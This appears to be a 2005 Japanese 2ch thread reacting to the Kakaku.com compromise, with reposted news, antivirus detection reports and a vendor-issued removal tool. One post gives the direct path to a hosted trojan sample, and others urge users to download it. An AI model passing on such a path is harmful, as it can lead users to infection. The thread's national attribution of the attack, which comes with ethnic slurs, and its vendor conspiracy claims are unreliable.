特別NOD32が速いわけでもないんじゃないの。

439 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:08:33
【価格.com問題】トップ・ページ閲覧だけで感染も,自ら対策ソフトの配布開始
 製品価格の情報提供会社「カカクコム」のWebサイトで,プログラムが改ざん
されウイルスへの感染が懸念されている問題で,その影響範囲が次第に分かって
きた。

 同社は本誌の取材に対し,「ユーザーの環境によっては,価格.comのトップ
・ページを見ただけで不正プログラムによってウイルスを取り込んでしまって
いた可能性がある」(広報室)ことを明らかにした。プログラムがいつから
改ざんされていたかについては「現時点では分かっていない」(同)という。

 この問題が発覚したのは5月11日。カカクコムが自社サイト上のプログラムが
改ざんされていることを発見。その後,監視を強化するなどの対策を採ったが,
14日にサイトを閉鎖した。復旧には約1週間がかかると見込まれている。

 またカカクコムは,対象となるウイルスを検知・削除できる対策ソフト
(キヤノンシステムソリューションズの製品体験版)を,自社のサイトで16日
から配布し始めた。ただし,すでに他社のウイルス対策ソフトを導入している
ユーザーはソフトウエアが競合する可能性があるため,このソフトは併用でき
ない。
「他社製品のユーザーがどのように対処すれば良いのかは,各ウイルス対策
ソフトのベンダーと話し合っている最中。新しい種類のウイルスであるとの
情報もある」(広報室)。ただし現時点で「カカクコムのWebサイトが原因で
ウイルスに感染したケースはないと認識している」(同)という。

 なおカカクコムは,本日夕方,代表取締役CEOの穐田誉輝氏などが一連の
問題について会見を開く予定。同社は現在のところ電子メールでの問い合わせ
に応じている。アドレスはsupport@kakaku.com。

http://itpro.nikkeibp.co.jp/free/NCC/NEWS/20050516/160876/

440 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:08:55
Fedora CORE3のISOイメージFC3-i386-disk3.isoをBitDefender VirusScanでスキャンしたら、Fedora/RPMS/mailman-2.1.5-26.i386.rpmの./usr/lib/mailman/test/msgs/nimda.txtがステータスSuspect Exploit.Iframe.Vulnerabilityになったのですが、大丈夫でしょうか?
さっきダウンロードしたアップデート版のmailman-2.1.5-32.i386.rpmも同様。

書き込むスレが間違っていたらすいません。

441 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:09:40
>>432
>328 名前:七氏 投稿日:2005/05/15(日) 21:21:14 ID:QFXxzuMm0
>価格コムと法人契約しているのだが、
>価格コムから直接サーバーダウン説明のメールが来た。
>
>サイバー攻撃を受け、全サービス停止しているとの事。
>警察にも通報し、対応中って書いてある。

昨日の21:00に顧客にpdf配ってたということは、
それよりだいぶ早くに症状掴んでたってことだよな。
土曜日に一時的に見えるようになったのはどういうことだろ。


442 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:10:04
>>435
>>319みろ

443 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:11:00
NODぁゃιぃ

444 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:12:20
NODが怪しいとなると、インストールしたユーザーがヤバイのか?
まさか時限爆弾抱えてないよな?どこかにping打ちまくるとか。
俺はチェック後アンインストールしたんだが・・・

445 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:13:01
>>433
必死だなw

フレッシュアイで検索したら、trojandownloader.small.AAOはウイルスドクターでも
対応しているようだ。マイナーソフトしか対応しとらんのか、このウイルスは。

446 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:13:15
NODがサイバーテロやるわけないがな。

もし価格コムが計画倒産を望んでいたなら、NODとともに自作自演
をやる可能性はあるだろうけど。
サイバーテロそのものは外国人にまかせればすむが。

447 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:14:35
NODってまともな会社なのか?

448 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:15:05
アンチNOD厨必死だなw
粘着質な基地外アンチNOD厨が居るのはNODスレ見ればわかるので惑わされないように

449 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:17:03
>>448
キヤノンさん頑張ってますね^^

450 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:17:21
>>449
 ↑
>>448


451 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:17:28
価格.comが一時閉鎖、不正アクセスでトロイの木馬を仕込まれる
ttp://internet.watch.impress.co.jp/cda/news/2005/05/16/7599.html

目新しいことは書いてない。

452 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:17:38
上級ユーザーのおいらはいつでも高みの見物
既に解析したものに興味などない
バカだよお 価格.COM

453 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:18:38
1.発覚から閉鎖まで数日間利用者を危険に晒し続けた価格comの責任
2.手際よくNODだけ対応状況が発表された不思議

NODの方がノートンやバスターと比べて情報伝達が早いと思えない
あやしい

454 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:19:42
>>453
明日は決算発表

455 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:20:19
去年のWindowsUpdateのパッチを当てていれば、対応できるという話が
あるから、大手のソフトはパッチを当てていることを前提にパターンファイルから
はずした、というのはありうるかな。

456 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:22:33
まとめサイトに、
>※NOD32 はノートンやウイルスバスターとは併用できないです。
って書いてあるけど、ノートンとかバスターがあらかじめ入ってる環境にNOD32インスコして
駆除しようとしてもしてもできないってこと?
それとも、駆除はできるけどなんか不具合が起こるかもよってこと?

457 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:22:48

255 名前:名無しさん@5周年[] 投稿日:2005/05/16(月) 12:57:16 ID:+VguF0Vj

犯人は中国(おそらく北京)の反日組織です。証拠を発見しました。

スクリプトの拡張子が普通じゃないのに注目して、"count/counter.ap?id="をググってみると、

ttp://www.google.com/search?q=%22count%2Fcounter.ap%3Fid%3D%22

j4sb.com以外に shtm1.com と 0x61.com が同じスクリプトを走らせていることが分かります。
whoisでこれらのサイト情報を検索すると

ttp://whois.ansi.co.jp/?key=shtm1.com
ttp://whois.ansi.co.jp/?key=0x61.com

Admin Name........... pi ger
Admin Address........ hidden
Admin Address........
Admin Address........ Beijing
Admin Address........ 123456
Admin Address........ BJ
Admin Address........ CN
Admin Email.......... fuckjpmm@china.com
Admin Phone.......... +86.1012345678
Admin Fax............ +86.1012345678

と出てきます。 fuckjpmm とは "Fuck Japanese!" 
どう見ても反日です。


458 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:22:57
20 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/03(火) 21:02:43
※緊急※ ウイルスバスターに続いて、NOD32で二度目の大きな不具合発生です。

NOD32をWindows Server 2003で使っているユーザーの方へ。
sp1をあてると通信不能となり、最悪の場合リブートの繰り返しとなります。気をつけて下さい。
開発元が現在対策中です。
ttp://canon-sol.jp/supp/nd/wndt4210.html

※過去(約1年前)の大きな不具合
●NOD32にレジストリを破壊してOS再インストールが必要になる重大バグが発生。
・Windows シャットダウン時にブルースクリーンになる問題
・登録済みのアプリが強制抹消される問題
ttp://canon-sol.jp/product/nd/v20008.html


こんなことやらかしてたのかw

459 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:23:26
>>457
そのコピペいまいち説得力に欠けるんだが

460 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:23:44
どうやらa02.cssだけっぽいね
あまり深刻ではなさそう

461 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:24:30
>>455
そんな事ないよお
ノートンは亜種の網羅数が足りない
最近また対応していないDownloadJectを見つけた
>>410

462 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:25:07
>>456
通常、常駐タイプのアンチウイルスは併用できません。


463 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:25:14
>>456
VB残したまま、NOD32入れて、再起動後、VB停止、NOD32で検索。
これでニュー速+に上がってる献体は検出できた。除去もできた。


464 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:26:02
.cssで5/11以降検出見つからず。ノートン5/15定義でウイルスチェックでも見つからず。
安心してよかですか?

465 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:26:03
一部上場してまとまった金が入ったら潰してしまえ、と?

466 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:27:42
>>459
でもさ、Trojan.PSW.Ajim_bbs 別名: Trojan.PSW.Delf.ac って
元々中国発のウイルスなんでしょ?


トロイの木馬はメモリに常駐している間、ユーザがProcess Viewerプログラム
(このトロイの木馬上のプロセスを終了するために使用可能なプログラム)を実行しようとした場合、
それを検知しエラーメッセージを表示します。
そのメッセージは中国語で書かれており、ほとんどの西洋言語のコンピュータでは次のように表示されます。


中国語のコンピュータでは次のように表示されます。

16進バイトでは、そのメッセージは次のように表示されます。

B7A2CFD6D2FDB5BCC7F8B2A1B6BEA3ACC7EBB5BD646F73CFC2C3E6D3C341C5CCA3A10000.

その後、トロイの木馬はユーザが実行しようとしたPview95.exeファイルを削除します。
その後、トロイの木馬は盗み出したパスワードをメールでこのトロイの木馬の作者に送信します。

http://www.symantec.com/region/jp/avcenter/venc/data/trojan.psw.ajim_bbs.html




467 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:28:06
>>464
http://news19.2ch.net/test/read.cgi/newsplus/1116211925/690

468 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:28:23
http://itpro.nikkeibp.co.jp/free/NCC/NEWS/20050516/160876/
またカカクコムは,対象となるウイルスを検知・削除できる対策ソフト
(キヤノンシステムソリューションズの製品体験版)を,
自社のサイトで16日から配布し始めた。

ただし,すでに他社のウイルス対策ソフトを導入しているユーザーは
ソフトウエアが競合する可能性があるため,このソフトは併用できない。

「他社製品のユーザーがどのように対処すれば良いのかは,
各ウイルス対策ソフトのベンダーと話し合っている最中。
新しい種類のウイルスであるとの情報もある」(広報室)。

ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。
工エェ(´Д`)ェエ工


469 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:29:51
http://www3.nhk.or.jp/news/2005/05/16/v20050516000085.html
NHK動画ニュース

470 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:30:08
>>461
ウイルスソフトの中でも高い金とってるほうなんだから、亜種の網羅数も
トップクラスでないと満足できんねー。

471 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:30:24
>新しい種類のウイルスであるとの情報もある」(広報室)。

じゃあ、それに即対応したNOD32が犯人じゃん。

472 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:32:23
>>462
>>463
サンクス
バスター立ち上げたまんまでNOD32で検索してた…orz


473 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:32:45
ねえ、今価格のサイト警告になってるじゃん?
ソースが文字化けしてるの俺だけ?
なんかきになる。

474 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:32:48
(・ω・)アヤスィ


475 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:32:52
>>同社は本誌の取材に対し,
>>「ユーザーの環境によっては,価格.comのトップ・ページを見ただけで
>>不正プログラムによってウイルスを取り込んでしまっていた可能性がある」(広報室)ことを明らかにした。

>>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。

俺の理解力がないのかな?
ちょっと言ってる意味がわからない

476 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:33:13
ノートン先生もうちょいで対応くるらしいぞ( ・∀・ )

477 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:35:07
>>475
危機管理能力が全くない会社
という理解でオケ

こんだけ他山の石が転がっている世の中なのにねw

478 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:35:22
Notonつーか、SAVで、定義は2005/05/15 rev.8で実験。
googleで引っかかるサイトにIEでアクセス。
キャッシュのディレクトリにj4sb.comからa02.css来た。

BitDefenderでこれをBehavesLike:Win32.AV-Killerとして検出。
Windowsディレクトリになどには反応しない状況。


479 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:35:25
このウイルスは今月の初めに:Win32.AV-KillerとしてBDに対処されていたものみたい。


480 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:35:32
どういう悪さをするVirusなんだかさぱーりわからん。
詳しい解説カキコってない?

481 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:36:16
>>471
>>438

482 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:36:25
>>480
詳しい解析結果は出てないと思われ。
飼って報告ヨロシク。

483 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:36:38
つうか一日35万件もヒットしているサイトがこんな手段で儲ける必要性を感じないな
今のままでも十分収益あげてるのにわざわざ込み入った陰謀計る意味わからん
それよりも隙あらば日本企業や日本政府のサイトに攻撃しかけてきてるシナチクハッカーの仕業だと
考えるほうが自然のような?

つい最近、あっちの抗日サイト2ちゃんねらに大量に荒らされた上、政府に閉鎖されたから
恨みに思ってる香具師らは大勢いるだろう・・・

ここはシナチクを想定の範囲に入れてない人が多いなぁ

484 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:36:43
>>468
あっちゃー。これはもう目も当てられないな。


485 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:36:50
>>475
まだサイト閲覧者から感染報告が来てないってことでは?

486 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:37:30
McAfee Part.17
http://pc8.2ch.net/test/read.cgi/sec/1114954465/

517 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/16(月) 15:35:48
価格コムの件、マカに問い合わせた。

現在の定義ファイルでは対応できてないそうだ。
対応のアップデートは、今週木曜の定期アップデートでかかるそうだ。

487 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:38:05
>>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。
>>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。
>>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。
>>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。
>>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。


488 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:38:09
ねえ、今価格のサイト警告になってるじゃん?
ソースが文字化けしてるの俺だけ?
なんかきになる。

489 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:38:57
中華の臭いがプンプン
頼むから、もうちょっと中華臭くないウイルスにしてくれないかwww

490 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:39:22
a01.cssからa10.cssまであるみたいなんだが他のやつはどうよ?

491 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:40:40
>>490
ちょっと直リン貼ってよ。
砂箱対応できない者は絶対に踏むなということで。

492 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:40:53
なんでだろう・・・。Firefoxから見ると文字化けしてない・・・。
メチャクチャ気になるんだけど、同じ症状の人いない?

493 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:41:59
パターン青

494 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:41:59
>>490
それがVirusファイル?スタイルシートファイル偽装してるの?

495 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:42:51
>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと
>認識している」(同)という。

価格コムの攻撃だけで感染例がないのに、なんでNOD32が対応しているんだ?

496 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:43:32
>>492
単にIEの文字エンコードがおかしくなってるだけと思われ。
履歴やクッキー合わせてキャッシュクリア汁!

497 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:43:35
記者さんに事前資料配付

穐田誉輝
http://japan.cnet.com/2004/sharedmedia/nils2004/02/041206nils_nawada.jpg

http://japan.cnet.com/column/nils2004/story/0,2000052176,20078624,00.htm
http://www.enjyuku.com/k/kp61.htm
http://www.tv-tokyo.co.jp/tobira/050312.html

http://it.nikkei.co.jp/it/column/zensen.cfm?i=20050210c7000c7
デジタル家電はさらなる値下げ努力を――カカクコム穐田誉輝代表取締役CEO


498 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:43:51
所で、今の所同じ症状になってるのって
J-RMTとj4sb.comで検索した時に出る三件だけ?

499 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:44:04
>>475
うーむ、つまりウイルス制作者と、XPSP2でパッチを当ててないようなIEユーザーと
サーバのセキュリティを請け負う会社の責任であって、価格.comの責任ではないと。

500 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:45:00
>>488
全然化けてないよ
すごく普通にソースみれる。

501 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:46:35
>492
文字エンコードの問題じゃないの?

502 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:46:50
今トレンドマイクロのオンラインスキャン中........

503 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:47:00
NODがぁゃιぃとか逝っている香具師は
シェアナンバー1のWindowsサーバが感染しているのに
アパッチが感染しないなんてぁゃιぃとか逝っている初心者と
同じだゴルァ

504 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:47:46
>>490
とりあえず最初のやつだけ。他のやつも同じところにありまつ。
www.j4sb.com/count/data/a01.css

今手元に全部取得してみたけど全部中身はHTML help形式っぽい。
ノートン先生は朝手動updateしたけど反応ないな。

505 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:48:42
まだどこからもセキュリティ警告のメールがとどかない。
今日中にはどこからかくるかな。

506 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:49:19
交流戦一桁祭りで焼豚煽ってた俺がきますたよ
んで、いいとも動画はどこ?

507 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:49:48
>>476
確認しますた

508 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:50:07
>>504
漏れ、a02.css対策の定義ファイル、シマンテックからメール来たから他のも試してみようか?

509 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:50:10
>>506

>>497
ネタ拾ってこい。恐らく敵は多いはずだ

510 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:51:19
Norton Rapid Release Virus Definitions
キター

511 :488:2005/05/16(月) 15:51:50
おお、やっとレスが・・・。
実はさっきからキャッシュもクッキーも履歴も削除してるんだが一向に直らない・・・。
文字エンコードも日本語から自動選択にしてみたけどやっぱりだめだ・・・。
しかも価格以外のサイトは普通に表示されるし・・・今この時期にこういうことが起こると心配なんだが。。

512 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:52:40
>>508
10個ともMD5が違うみたいなのでできれば全部お願いしまつ。

513 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:52:59
>>511
ヤバイヨヤバイヨ

514 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:54:36
>>502
価格.comのウイルスにはまだ未対応だから m9(^Д^)プギャー

515 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:54:40
ftp://ftp.symantec.com/AVDEFS/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe

516 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:54:52
>>488
EUC-JP コードを解釈できる、エディタを使わないと文字化けする。
メモ帳は Shift_JIS しか解釈できないので、NG

517 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:55:05
>>511
ただ単にIEの文字エンコード誤判断だと思うけど・・・
手動でEUCに設定してみてもダメ?

518 :506:2005/05/16(月) 15:55:32
>>511
ひょっとして、マジ?
<meta http-equiv=Content-Type content="text/html; charset=EUC-JP">
とか書いてない?
それはヤバイよ
マジヤバイおそらくLinuxに変わったからだろうね
マジヤバイ

519 :名無しさん@お腹いっぱい。 :2005/05/16(月) 15:55:56
ノートン先生では見つからなかったけど、BitDefnderで検知しやがった…

520 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:56:53
>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと
>認識している」(同)という。

価格コムの攻撃だけで感染例がないのに、NOD32だけが対応してるのおかしいだろ。




521 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:57:41
>467
ありがとう。対応用ができるまで待ちますです

522 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:58:11
>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(笑)という。

523 :508:2005/05/16(月) 15:58:21
>>512
a02.cssとa05.cssしか検出しなかった。


524 :516:2005/05/16(月) 15:58:37
俺の勘違いだったかな…。
俺は「ソース表示」で開いたメモ帳のソースが文字化けしているという意味だと思ったんだが
ブラウザの表示で文字化けしてるんなら、>>516は見当違いのアドバイスだった

525 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:58:49
カカクコムが今回の件のウイルス対策のみ出来る
インスコ不要な単体駆除ソフト配布してくれ。

526 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:59:33
ノートン先生やバスターを入れてても大丈夫なフリーなアンチウイルスソフトBitDefender Free Edition
の使用方法を日本語で詳しく解説。
http://cowscorpion.com/FAQ/inst/bitdefender.html

527 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:59:58
>>520
>>519

528 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:00:34
>>495
実際に感染したかどうかは別にして、感染例はあったのよ。
NOD32は11日対応。Kasperskyは5日。Sybariの対応日は不明。

Trojan-PSW.Win32.Delf.fz
http://www.viruslist.com/en/viruses/encyclopedia?virusid=80118

529 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:01:19
>>440
ヒント:nimda.txt

530 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:01:47
>>528
>NOD32は11日対応
タイミング的に・・・どうなの?

531 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:02:07
nida.txt

532 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:02:24
>>488
オマイだけ

533 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:02:40
>>519>>523
d

こっちもa02.cssとa05.cssしか検出できなかった。
NOD32だと全部検出できるのかな?

534 :488:2005/05/16(月) 16:03:37
みんなレスサンクス。。
>>524
そのとおりです。ソース表示でひらいたメモ帳が文字化けしてるんです。
ただの仕様だったんですね。よかった・・・。


535 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:04:37
これって今回シナ人が攻撃をしかけたとして
同様のことを日本人がシナに向けて出来るの?

536 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:04:50
>>534
おそろしい子

537 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:05:50
>>535
捕まるけど。できるよ。捕まるけど。

538 :528:2005/05/16(月) 16:05:55
>>530
アドバンスドヒューリスティックかなにかで引っかかって誰かが送ったのでは?

539 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:05:57
>>523
ノートンは今の所そのようだね

540 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:07:33
>>539
他のも検体送っといたほうがいいのかな?

541 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:07:59
>>510
2005/05/15 rev.35
検出するけど検疫は失敗。
\Temporary Internet Files をリスキャンすると引っかからない。
ログだと「放置」なのでキャッシュ消したほうがイイってことか。

スキャンの種類:  Auto-Protect スキャン
イベント:  脅威が見つかりました!
脅威: Trojan.Jasbom
ファイル:  C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\CT47WZ8J\a02[1].css
場所:  C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\CT47WZ8J
コンピュータ:  
ユーザー:  
適用した処理:  クリーニング 失敗 : 検疫 失敗 : アクセスが拒否されました
検出日: 2005年5月16日  16:05:11


542 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:08:50
>>540
おれさっきどっかのスレで「献体」って書いちゃった_| ̄|○

543 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:08:53
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELF.RM

544 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:09:44
>>543
お、きたね。

545 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:10:40
>>542
http://www.hosp.med.keio.ac.jp/kensa/gif/benn.gif

546 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:10:58
>>543
結局、対処法は「消せ!」ってこと?

547 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:11:28
503がわかりやすい宣伝工作してます

548 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:11:49
>>540
その前に下で検査して結果を教えて。

VirusTotal
http://www.virustotal.com/
Jotti's malware scan
http://virusscan.jotti.org/
(どちらも検査結果表示のためにjavascriptを有効にして検査)

549 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:12:13
>>543
日本のサイトでは一番はやく対応してきたか。しかしあまり対応が早いというのも
不安。しかもそれがトレンドマイクロという不安。

550 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:12:21
えろい人たちこちらも鑑定おながいします
http://www.google.co.jp/search?hl=ja&lr=&oe=Shift_JIS&inlang=ja&q=+site:www.shtm1.com+%22shtm1.com%22

551 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:13:25
>>543
おー。自動駆除ツールがあるじゃないか。


552 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:14:59
トレンドマイクロは、駆除ツールに別のウィルスを仕込んで・・・(r

553 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:15:17
>>520
何かアホーBBが個人情報漏れ発覚直後に発表した内容と似てる。
確か最初は2、3百人でそれ以外はない。とか言ってた。

554 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:15:39
>>543
感染数
Japan 49
United States 1

これはアメリカ在住の日本人ってことかしら、、、

555 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:16:01
トレンドマイクロでは「TROJ_DELF.RM」の自動駆除ツールを
ご用意いたしました。以下のURLからダウンロード後、実行することによって
自動的に駆除が行えます。ご利用ください:
http://www.trendmicro.co.jp/support/virus/fix_tool/TROJ_DELF_RM/fix_delfRM.com

556 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:16:06
>543
キタコレ。自動駆除やっときゃ桶すか?

557 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:16:17
落としたけど・・・実行するのが不安・・・TMだと・・・。

558 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:16:41
今shtm1.comを拾ってるんだけど1.28kByte/sしか出ない...。

a01.cssだけ取れたけどファイルの大きさが違うので亜種の可能性あり。

559 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:17:16
>>543
駆除ツールより感染確認方法のほうが役に立つ
トレンドマイクロだから使うの怖いよw

560 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:17:35
>>543
情報漏洩:
 不正プログラムが作成したDLLファイルは、キー入力操作情報を収集する機能を持っています。

-------

ちゃんとしたトロイだったんだな。怖い怖い

561 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:17:56
しかし何で閲覧しただけで感染できてしまうん?

562 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:18:11
随分ヤバいVirusだなコレ

563 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:18:21
>>555
こんな感じ

Damage Cleanup Engine (DCE) 3.9(Build 1020)
Windows 2000(Build 2195: Service Pack 4)

Start time : 月 5 16 2005 16:17:13

Load Damage Cleanup Template (DCT) "C:\Documents and Settings\?????\デスクトップ\fix_delfRM\tsc.ptn" (version 999) [success]

Complete time : 月 5 16 2005 16:17:13
Execute pattern count(1), Virus found count(0), Virus clean count(0), Clean failed count(0)

564 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:19:11
トレンドマイクロGJ

565 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:20:00
トレンドマイクロ必死だな

566 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:20:19
>>564
汚名返上、名誉挽回!

567 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:20:28
ありがとう、トレンドマイクロ

568 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:21:10
>>555
感染してないけど勇気を持って実行してみたが
すでにやってる人がいた、、、
でもまったいないから晒しとく

---------

Damage Cleanup Engine (DCE) 3.9(Build 1020)
Windows XP(Build 2600: Service Pack 2)

Start time : 月 5 16 2005 16:19:14

Load Damage Cleanup Template (DCT) "C:\Documents and Settings\(ユーザー名)i\デスクトップ\fix_delfRM\tsc.ptn" (version 999) [success]

Complete time : 月 5 16 2005 16:19:14
Execute pattern count(1), Virus found count(0), Virus clean count(0), Clean failed count(0)

569 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:23:01
>>555
それ実行したけど、サンプルとして保存しているa02.cssヒットしなかったぞ。

570 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:23:17
トレンドマイクロの勝ち。


571 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:23:40
駆除ツールを実行したはいいが感染してたかさえもわかってなかったから結局心配('A`)

この駆除ツールって価格事件のウイルス全部削除できるわけじゃないよな
やっぱり心配('A`)

572 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:23:44
>>570
>>569

573 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:24:11
>>569
>>571

574 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:24:34
感染確認方法に書いてあるDLL無かったから大丈夫かな?

575 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:24:49
レジストリいじる勇気がない・・・orz


576 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:24:51
所詮、トレンドマイクロだからな・・・
オレ様子見る。

577 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:24:52
>Execute pattern count(1), Virus found count(0), Virus clean count(0), Clean failed count(0)
これは感染してなかったってことか?


578 :NOD32使い:2005/05/16(月) 16:25:05
>>555

Damage Cleanup Engine (DCE) 3.9(Build 1020)
Windows 2000(Build 2195: Service Pack 4)

Start time : 月 5 16 17 16:23:12

Load Damage Cleanup Template (DCT) "C:\Documents and Settings\Administrator\デスクトップ\fix_delfRM\tsc.ptn" (version 999) [success]

Complete time : 月 5 16 17 16:23:12
Execute pattern count(1), Virus found count(0), Virus clean count(0), Clean failed count(0)

579 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:25:23
>>569
やっぱし?

580 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:25:53
